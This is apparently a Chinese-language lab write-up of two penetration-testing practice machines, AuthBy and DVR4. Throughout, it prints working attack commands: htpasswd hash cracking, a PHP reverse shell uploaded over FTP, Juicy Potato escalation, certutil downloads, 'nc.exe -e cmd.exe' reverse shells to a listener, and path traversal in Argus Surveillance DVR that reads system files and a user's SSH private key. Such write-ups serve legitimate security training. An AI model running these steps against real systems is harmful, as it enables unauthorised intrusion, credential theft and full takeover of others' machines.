-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd -r--r--r-- 1 root root 161 Nov 08 2011 .htaccess d--x--x--x 1 root root 512 Mar 23 06:14 .. d--x--x--x 1 root root 512 Mar 23 06:14 . ``` wget 到本機 ``` ┌──(chw㉿CHW)-[~] └─$ wget -r ftp://admin:admin@192.168.124.46 ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ cat index.php <center><pre>Qui e nuce nuculeum esse volt, frangit nucem!</pre></center> ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ cat .htpasswd offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0 ``` ### 3. Hashcat Hashcat 爆出 offsec 密碼 ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ hashid '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' -m Analyzing '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' [+] MD5(APR) [Hashcat Mode: 1600] [+] Apache MD5 [Hashcat Mode: 1600] ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ cat AuthBy.hash $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0 ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ hashcat -m 1600 AuthBy.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force hashcat (v6.2.6) starting ... $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite ... ``` > 嘗試登入 Http 或 rdp ### 4. Offsec 登入 #### 4.1 登入 RDP ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ rdesktop 192.168.124.46 ``` > RDP 失敗 ![image](https://hackmd.io/_uploads/HyoaqQThkl.png) #### 4.2 登入 HTTP ![image](https://hackmd.io/_uploads/HJMTKXT2yx.png) > 成功,且顯示 index.php 在 ftp 上傳 shell,驗證能否成功顯示 ### 5. Reverse Shell >[!Tip] >🎯 兩種方法 >1. PHP ( wget kali 的 `rev.exe` 並執行) >2. 在 php 直接建 reverse shell 使用現成 [ivan-sincek](https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php) 寫好的 reverse shell ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ cat chw_revall.php ... echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.45.165', 8888); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc_collect_cycles(); echo '</pre>'; ?> ``` 上傳 FTP Server ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ ftp admin@192.168.124.46 Connected to 192.168.124.46. 220 zFTPServer v6.0, build 2011-10-17 15:25 ready. 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> put chw_revall.php local: chw_revall.php remote: chw_revall.php 229 Entering Extended Passive Mode (|||2067|) 150 File status okay; about to open data connection. 100% |**********************************************************************************************| 9408 48.49 MiB/s 00:00 ETA 226 Closing data connection. 9408 bytes sent in 00:00 (30.04 KiB/s) ftp> ls 229 Entering Extended Passive Mode (|||2068|) 150 Opening connection for /bin/ls. total 34 -r--r--r-- 1 root root 76 Nov 08 2011 index.php -r--r--r-- 1 root root 9408 Mar 23 14:22 chw_revall.php -r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd -r--r--r-- 1 root root 161 Nov 08 2011 .htaccess 226 Closing data connection. ``` Kali 開啟監聽 port ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ nc -nvlp 8888 listening on [any] 8888 ... ``` 瀏覽上傳檔案: http://192.168.124.46:242/chw_revall.php \ `curl -u 'offsec:elite' -X GET http://192.168.124.46:242/chw_revall.php` ### 6. 取得 Shell ``` ┌──(chw㉿CHW)-[~/192.168.124.46] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.165] from (UNKNOWN) [192.168.124.46] 49159 SOCKET: Shell has connected! PID: 2624 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:\wamp\bin\apache\Apache2.2.21>whoami livda\apache ``` ### ✅ Get User Flag > 在 `C:\Users\apache\Desktop`找到 User flag ## Privileges Escalation ``` C:\wamp\bin\apache\Apache2.2.21>whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ==================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Unknown SID type S-1-16-12288 Mandatory group, Enabled by default, Enabled group C:\wamp\bin\apache\Apache2.2.21>systeminfo Host Name: LIVDA OS Name: Microsoftr Windows Serverr 2008 Standard OS Version: 6.0.6001 Service Pack 1 Build 6001 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 92573-OEM-7502905-27565 Original Install Date: 12/19/2009, 11:25:57 AM System Boot Time: 3/23/2025, 12:48:23 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT-08:00) Pacific Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 1,675 MB Page File: Max Size: 1,985 MB Page File: Available: 1,555 MB Page File: In Use: 430 MB Page File Location(s): N/A Domain: WORKGROUP Logon Server: N/A Hotfix(s): N/A Network Card(s): N/A C:\wamp\bin\apache\Apache2.2.21>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled C:\wamp\bin\apache\Apache2.2.21>whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ==================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Unknown SID type S-1-16-12288 Mandatory group, Enabled by default, Enabled group ``` > 1. shell 是以 `NT AUTHORITY\SERVICE` 執行 (S-1-5-6) > ![image](https://hackmd.io/_uploads/ry-wGrT3yg.png) > 2. SeImpersonatePrivilege 可以嘗試利用 PrintSpoofer ### 7. SigmaPotato ``` ┌──(chw㉿CHW)-[~/Desktop/upload_tools] └─$ wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe ┌──(chw㉿CHW)-[~/Desktop/upload_tools] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` 使用 powershell ``` C:\Windows\System32>dir /s /b C:\powershell.exe :\Windows\winsxs\x86_microsoft-windows-powershell-exe_31bf3856ad364e35_6.0.6001.18000_none_6915feb40232a384\powershell.exe C:\Windows\System32> C:\Windows\System32>\Windows\winsxs\x86_microsoft-windows-powershell-exe_31bf3856ad364e35_6.0.6001.18000_none_6915feb40232a384\powershell.exe C:\Windows\System32>powershell 'powershell' is not recognized as an internal or external command, operable program or batch file. C:\Windows\System32>copy "C:\Windows\winsxs\x86_microsoft-windows-powershell-exe_31bf3856ad364e35_6.0.6001.18000_none_6915feb40232a384\powershell.exe" C:\Windows\System32\ Access is denied. 0 file(s) copied. ``` > 不能使用 Powershell ``` C:\Windows\System32>wget 'wget' is not recognized as an internal or external command, operable program or batch file. C:\Windows\System32>iwr 'iwr' is not recognized as an internal or external command, operable program or batch file. C:\Windows\System32>curl 'curl' is not recognized as an internal or external command, operable program or batch file. C:\Windows\System32>certutil CertUtil: -dump command completed successfully. ``` > 只有 CertUtil 可用 下載 SigmaPotato.exe ``` C:\Windows\System32>certutil -urlcache -split -f http://192.168.45.165/SigmaPotato.exe SigmaPotato.exe **** Online **** CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5) CertUtil: Access is denied. ``` > 路徑不可寫 改至 `C:\Users\Public` 或 `C:\Windows\Temp` ``` C:\Users\Public>certutil -urlcache -split -f http://192.168.45.165/SigmaPotato.exe SigmaPotato.exe **** Online **** CertUtil: -URLCache command completed successfully. C:\Users\Public>dir Volume in drive C has no label. Volume Serial Number is BCAD-595B Directory of C:\Users\Public 03/23/2025 01:45 AM <DIR> . 03/23/2025 01:45 AM <DIR> .. 03/23/2025 01:44 AM 0 certutil 01/19/2008 01:45 AM <DIR> Documents 01/19/2008 01:45 AM <DIR> Downloads 01/19/2008 01:45 AM <DIR> Music 01/19/2008 01:45 AM <DIR> Pictures 03/23/2025 01:45 AM 63,488 SigmaPotato.exe 01/19/2008 01:45 AM <DIR> Videos 2 File(s) 63,488 bytes 7 Dir(s) 6,031,769,600 bytes free C:\Users\Public>.\SigmaPotato "net user chw chw /add" C:\Users\Public>.\SigmaPotato "net localgroup Administrators chw /add" C:\Users\Public>net user chw The user name could not be found. More help is available by typing NET HELPMSG 2221. ``` > 上網 research 後, `SigmaPotato` 不支援 Windows 7/2008 R2 (x86/x64),需要使用 Juicy-Potato-x86 ### 8. Juicy-Potato-x86 #### 8.1 下載 Juicy-Potato-x86.exe ``` C:\Users\Public>certutil -urlcache -split -f http://192.168.45.165/Juicy.Potato.x86.exe **** Online **** CertUtil: -URLCache command completed successfully. C:\Users\Public>dir Volume in drive C has no label. Volume Serial Number is BCAD-595B Directory of C:\Users\Public 03/23/2025 02:27 AM <DIR> . 03/23/2025 02:27 AM <DIR> .. 03/23/2025 01:44 AM 0 certutil 01/19/2008 01:45 AM <DIR> Documents 01/19/2008 01:45 AM <DIR> Downloads 03/23/2025 02:27 AM 263,680 Juicy.Potato.x86.exe 01/19/2008 01:45 AM <DIR> Music 01/19/2008 01:45 AM <DIR> Pictures 03/23/2025 01:45 AM 63,488 SigmaPotato.exe 01/19/2008 01:45 AM <DIR> Videos 3 File(s) 327,168 bytes 7 Dir(s) 6,030,557,184 bytes free ``` 另外使用 Juicy-Potato-x86 打 reverse shell 會使用 nc.exe ``` C:\Users\Public>certutil -urlcache -split -f http://192.168.45.165/nc_x86.exe nc.exe ``` #### 8.2 查詢 CLID Juicy-Potato-x86 需要一組可用 CLSID\ [CLID ](https://github.com/ohpe/juicy-potato/tree/master/CLSID/?source=post_page-----96e74b36375a---------------------------------------):`{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}`\ ![image](https://hackmd.io/_uploads/H11LS86nye.png) ### 8.3 執行 Juicy-Potato-x86 ``` C:\Users\Public>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/cc:\users\Public\nc.exe -e cmd.exe 192.168.45.165 6666" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337 .... [+] authresult 0 {9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK ``` >`-l 1337`: 開一個偽裝的 COM listening port (不要衝突 Service TCP port 即可)\ >`-p c:\windows\system32\cmd.exe`: 指定執行系統內建的 cmd.exe\ >`-a "/cc:\users\Public\nc.exe -e cmd.exe 192.168.45.165 6666"`: nc reverse shell >`-t *`: COM type `*` 表示使用預設 DCOM 授權方式(LocalService、NetworkService 等)\ >`-c CLID`: 指定要利用的 COM CLSID (Kali) ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 6666 listening on [any] 6666 ... connect to [192.168.45.165] from (UNKNOWN) [192.168.124.46] 49360 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system ``` >[!Important] >後來參考其他 Writeup: >windows server 2008 standard 6001 privilege escalation\ >有 exploit 可以直接使用\ >`searchsploit ms11-046` ### ✅ Get Root FLAG > 在 `C:\Users\Administrator\Desktop` 找到 Root flag # DVR4 ![image](https://hackmd.io/_uploads/Bk8f0I631e.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 -p- 192.168.124.179 ... Host is up (0.12s latency). Not shown: 65507 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use) | ssh-hostkey: | 3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA) |_ 384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 326/tcp filtered unknown 445/tcp open microsoft-ds? 481/tcp filtered dvs 637/tcp filtered lanserver 1953/tcp filtered rapidbase 3978/tcp filtered secure-cfg-svr 3998/tcp filtered dnx 5040/tcp open unknown 8080/tcp open http-proxy |_http-title: Argus Surveillance DVR |_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE] | fingerprint-strings: | GetRequest, HTTPOptions: | HTTP/1.1 200 OK | Connection: Keep-Alive | Keep-Alive: timeout=15, max=4 | Content-Type: text/html | Content-Length: 985 | <HTML> | <HEAD> | <TITLE> | Argus Surveillance DVR | </TITLE> | <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> | <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]"> | <frameset frameborder="no" border="0" rows="75,*,88"> | <frame name="Top" frameborder="0" scrolling="auto" noresize src="CamerasTopFrame.html" marginwidth="0" marginheight="0"> | <frame name="ActiveXFrame" frameborder="0" scrolling="auto" noresize src="ActiveXIFrame.html" marginwidth="0" marginheight="0"> | <frame name="CamerasTable" frameborder="0" scrolling="auto" noresize src="CamerasBottomFrame.html" marginwidth="0" marginheight="0"> | <noframes> | <p>This page uses frames, but your browser doesn't support them.</p> |_ </noframes> 12745/tcp filtered unknown 17951/tcp filtered unknown 22015/tcp filtered unknown 35995/tcp filtered unknown 37289/tcp filtered unknown 37889/tcp filtered unknown 42948/tcp filtered unknown 44953/tcp filtered unknown 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 52732/tcp filtered unknown 63296/tcp filtered unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.95%I=7%D=3/23%Time=67DFE268%P=aarch64-unknown-linux-gn ... Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-03-23T10:31:34 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: -1s ``` > SSH, RPC, Http-proxy, 瀏覽 http://192.168.124.179:8080/\ ![image](https://hackmd.io/_uploads/SJVeVwTnJe.png) 瀏覽 http://192.168.124.179:8080/CamConfDevices.html?Cameras=new\ ![image](https://hackmd.io/_uploads/HygGEP6hkx.png) 瀏覽 http://192.168.124.179:8080/Users.html ![image](https://hackmd.io/_uploads/rymYCwp3Jx.png) > 透露 User #### 1.2 Http-proxy scan ``` ┌──(chw㉿CHW)-[~/Tools/spose_http-proxy-scanner] └─$ python3 spose.py --proxy http://192.168.124.179:8080 --target 192.168.124.179 Scanning default common ports Using proxy address http://192.168.124.179:8080 ``` #### 1.3 Enum4linux ``` ┌──(chw㉿CHW)-[~] └─$ enum4linux -a 192.168.124.179 ... ┌──(chw㉿CHW)-[~] └─$ smbclient -N -L \\\\192.168.124.179\\ session setup failed: NT_STATUS_ACCESS_DENIED ``` > 沒有可利用的資訊 #### 1.4 Searchsploit ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit Argus Surveillance DVR ----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Argus Surveillance DVR 4.0 - Unquoted Service Path | windows/local/50261.txt Argus Surveillance DVR 4.0 - Weak Password Encryption | windows/local/50130.py Argus Surveillance DVR 4.0.0.0 - Directory Traversal | windows_x86/webapps/45296.txt Argus Surveillance DVR 4.0.0.0 - Privilege Escalation | windows_x86/local/45312.c ----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ┌──(chw㉿CHW)-[~] └─$ searchsploit -x 50261 ┌──(chw㉿CHW)-[~] └─$ searchsploit -x 50130 ┌──(chw㉿CHW)-[~] └─$ searchsploit -x 45296 ``` > Directory Traversal 可以嘗試利用 ### 2. Exploit - Path Traversal 查看 `/windows/system.ini` ``` ┌──(chw㉿CHW)-[~] └─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] ``` 查看 `/Windows/win.ini` ``` ┌──(chw㉿CHW)-[~] └─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?RESULTPAGE=../../../../../../../../Windows/win.ini" ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ``` 🧠 已洩漏了 User:\ 那直接 Path Traversal 拿 Flag XDD ``` ┌──(chw㉿CHW)-[~] └─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?RESULTPAGE=../../../../../../../../Users/Viewer/Desktop/local.txt" {Flag} ``` ### ✅ Get User Flag > 在 `C:\Users\apache\Desktop`找到 User flag 🥚 仍需要提權,可以讀取 User `id_rsa`,使用 SSH 登入 ### 3. SSH Login ``` ┌──(chw㉿CHW)-[~] └─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?RESULTPAGE=../../../../../../../../Users/Viewer/.ssh/id_rsa" -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAuuXhjQJhDjXBJkiIftPZng7N999zteWzSgthQ5fs9kOhbFzLQJ5J Ybut0BIbPaUdOhNlQcuhAUZjaaMxnWLbDJgTETK8h162J81p9q6vR2zKpHu9Dhi1ksVyAP iJ/njNKI0tjtpeO3rjGMkKgNKwvv3y2EcCEt1d+LxsO3Wyb5ezuPT349v+MVs7VW04+mGx pgheMgbX6HwqGSo9z38QetR6Ryxs+LVX49Bjhskz19gSF4/iTCbqoRo0djcH54fyPOm3OS 2LjjOKrgYM2aKwEN7asK3RMGDaqn1OlS4tpvCFvNshOzVq6l7pHQzc4lkf+bAi4K1YQXmo 7xqSQPAs4/dx6e7bD2FC0d/V9cUw8onGZtD8UXeZWQ/hqiCphsRd9S5zumaiaPrO4CgoSZ GEQA4P7rdkpgVfERW0TP5fWPMZAyIEaLtOXAXmE5zXhTA9SvD6Zx2cMBfWmmsSO8F7pwAp zJo1ghz/gjsp1Ao9yLBRmLZx4k7AFg66gxavUPrLAAAFkMOav4nDmr+JAAAAB3NzaC1yc2 EAAAGBALrl4Y0CYQ41wSZIiH7T2Z4Ozfffc7Xls0oLYUOX7PZDoWxcy0CeSWG7rdASGz2l HToTZUHLoQFGY2mjMZ1i2wyYExEyvIdetifNafaur0dsyqR7vQ4YtZLFcgD4if54zSiNLY 7aXjt64xjJCoDSsL798thHAhLdXfi8bDt1sm+Xs7j09+Pb/jFbO1VtOPphsaYIXjIG1+h8 ... -----END OPENSSH PRIVATE KEY----- ``` 儲存在本機 ``` ┌──(chw㉿CHW)-[~] └─$ curl "http://192.168.124.179:8080/WEBACCOUNT.CGI?RESULTPAGE=../../../../../../../../Users/Viewer/.ssh/id_rsa" > DVR4_rsa % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 2612 100 2612 0 0 9860 0 --:--:-- --:--:-- --:--:-- 9893 ``` SSH 登入 ``` ┌──(chw㉿CHW)-[~] └─$ chmod 600 DVR4_rsa ┌──(chw㉿CHW)-[~] └─$ ssh viewer@192.168.124.179 -i DVR4_rsa Microsoft Windows [Version 10.0.19044.1645] (c) Microsoft Corporation. All rights reserved. C:\Users\viewer>whoami dvr4\viewer C:\Users\viewer>hostname DVR4 C:\Users\viewer>powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\Users\viewer> ``` ## Privileges Escalation ### 4. PowerUp.ps1 ``` ┌──(chw㉿CHW)-[~/Desktop/upload_tools] └─$ ls PowerUp.ps1 ... ┌──(chw㉿CHW)-[~/Desktop/upload_tools] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ``` S C:\Users\viewer> iwr -Uri http://192.168.45.165/PowerUp.ps1 -UseBasicParsing -Outfile PowerUp.ps1 | Column 1 | Column 2 | Column 3 | | -------- | -------- | -------- | | Text | Text | Text | PS C:\Users\viewer> powershell -ep bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\Users\viewer> . .\PowerUp.ps1 PS C:\Users\viewer> Get-ModifiableServiceFile Get-ModifiableServiceFile : The term 'Get-ModifiableServiceFile' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + Get-ModifiableServiceFile + ~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Get-ModifiableServiceFile:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException ``` > viewer 無法存取 Win32_Service WMI ### 5. Searchsploit 🧠 在 `1.4 Searchsploit` 中有看到 `Argus Surveillance DVR 4.0 - Weak Password Encryption` ``` ┌──(chw㉿CHW)-[~/Desktop/upload_tools] └─$ searchsploit -x 50130 # Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 12.07.2021 # Version: Argus Surveillance DVR 4.0 # Tested on: Windows 7 x86 (Build 7601) & Windows 10 # Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack # Note: Argus Surveillance DVR 4.0 configuration is present in # C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini # I'm too lazy to add special characters :P ... ``` > 查看 `C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini`\ >[!Note] >也可以直接搜尋檔案確認:\ >`Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter "DVRParams.ini" ` 確認存在路徑 ``` PS C:\> dir -Force Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hs- 12/3/2021 12:29 AM $Recycle.Bin d--h-- 4/15/2022 5:02 AM $WinREAgent d--hs- 4/15/2022 7:08 AM Config.Msi d--hsl 6/18/2021 10:28 AM Documents and Settings d----- 12/7/2019 1:14 AM PerfLogs d-r--- 4/15/2022 7:07 AM Program Files d-r--- 6/18/2021 5:55 AM Program Files (x86) d--h-- 12/3/2021 12:24 AM ProgramData d--hs- 3/11/2022 10:03 PM Recovery d--hs- 6/18/2021 3:31 AM System Volume Information d-r--- 12/3/2021 12:21 AM Users d----- 4/15/2022 7:07 AM Windows -a-hs- 8/1/2024 10:33 PM 8192 DumpStack.log.tmp -a---- 3/23/2025 6:06 AM 2690 output.txt -a-hs- 8/1/2024 10:33 PM 671088640 pagefile.sys -a-hs- 8/1/2024 10:33 PM 268435456 swapfile.sys PS C:\> type "C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini" [Main] ServerName= ServerLocation= ServerDescription= ... [Users] LocalUsersCount=2 UserID0=434499 LoginName0=Administrator ... Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8 ... Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE ... ``` ### 6. 使用 exploit ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit -m 50130 ┌──(chw㉿CHW)-[~] └─$ vi 50130.py ... # Change this :) pass_hash = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A85E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE" if (len(pass_hash)%4) != 0: print("[!] Error, check your password hash") exit() split = [] n = 4 ... ┌──(chw㉿CHW)-[~] └─$ python3 50130.py ######################################### # _____ Surveillance DVR 4.0 # # / _ \_______ ____ __ __ ______ # # / /_\ \_ __ \/ ___\| | \/ ___/ # # / | \ | \/ /_/ > | /\___ \ # # \____|__ /__| \___ /|____//____ > # # \/ /_____/ \/ # # Weak Password Encryption # ############ @deathflash1411 ############ [+] ECB4:1 [+] 53D1:4 [+] 6069:W [+] F641:a [+] E03B:t [+] D9BD:c [+] 956B:h [+] FE36:D [+] BD8F:0 [+] 3CD9:g [-] D9A8:Unknown [+] 5E53:I [+] 4D7B:m [+] 6069:W [+] F641:a [+] E03B:t [+] D9BD:c [+] 956B:h [+] C875:i [+] EB60:n [+] 3CD9:g [+] D8E1:Y [+] BD8F:0 [+] AAFE:u ``` > [-] D9A8:Unknown 是特殊字元\ > 找到更詳細的 Exploit [CVE-2022-25012](https://github.com/s3l33/CVE-2022-25012/blob/main/CVE-2022-25012.py) > D9A8:`$` > >`14WatchD0g$ImWatchingY0u` 現在有 Admin 帳號密碼,但沒有 id_rsa 無法用 SSH 登入 ### 7. Runas 使用 Runs 再利用 nc.exe 開一個 revershell #### 7.1 確認系統環境 ``` PS C:\Users\viewer\Desktop> systeminfo ERROR: Access denied PS C:\Users\viewer\Desktop> [Environment]::Is64BitOperatingSystem True ``` > systeminfo 權限不足,使用 `[Environment]::Is64BitOperatingSystem` >> x64 #### 7.2 下載 nc.exe (Kali) ``` ┌──(chw㉿CHW)-[~/Desktop/upload_tools] └─$ ls nc_x64.exe ... ┌──(chw㉿CHW)-[~/Desktop/upload_tools] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` (Windows) ``` PS C:\Users\viewer\Desktop> iwr -uri http://192.168.45.178/nc_x64.exe -Outfile nc.exe PS C:\Users\viewer\Desktop> ls Directory: C:\Users\viewer\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/23/2025 6:06 AM 34 local.txt -a---- 3/23/2025 6:57 AM 207523 nc.exe ``` #### 7.3 執行 Runas Admin Kali 開啟監聽 port ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 8888 listening on [any] 8888 ... ``` 執行 Runas Admin ``` PS C:\Users\viewer\Desktop> runas /user:administrator "C:\users\viewer\desktop\nc.exe -e cmd.exe 192.168.45.178 8888" Enter the password for administrator: Attempting to start C:\users\viewer\desktop\nc.exe -e cmd.exe 192.168.45.178 8888 as user "DVR4\administrator" ... ``` #### 7.4 取得 Shell ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.178] from (UNKNOWN) [192.168.124.179] 50691 Microsoft Windows [Version 10.0.19044.1645] (c) Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami whoami dvr4\administrator ``` ### ✅ Get Root FLAG > 在 `C:\Users\Administrator\Desktop` 找到 Root flag